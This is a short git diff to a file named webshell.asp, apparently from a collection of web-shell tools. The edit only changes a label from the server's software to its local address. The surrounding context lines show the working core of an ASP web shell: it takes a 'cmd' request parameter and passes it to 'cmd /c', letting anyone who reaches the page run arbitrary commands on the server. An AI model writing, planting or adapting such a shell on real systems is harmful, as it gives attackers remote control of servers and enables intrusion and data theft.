diff --git a/asp/webshell.asp b/asp/webshell.asp index d5e7d04..248b4ec 100644 --- a/asp/webshell.asp +++ b/asp/webshell.asp @@ -39,7 +39,7 @@ end Function <%Response.Write(Request.ServerVariables("server_software"))%>

-The server's software: +The server's local address: <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%> <% szCMD = request("cmd") thisDir = getCommandOutput("cmd /c" & szCMD)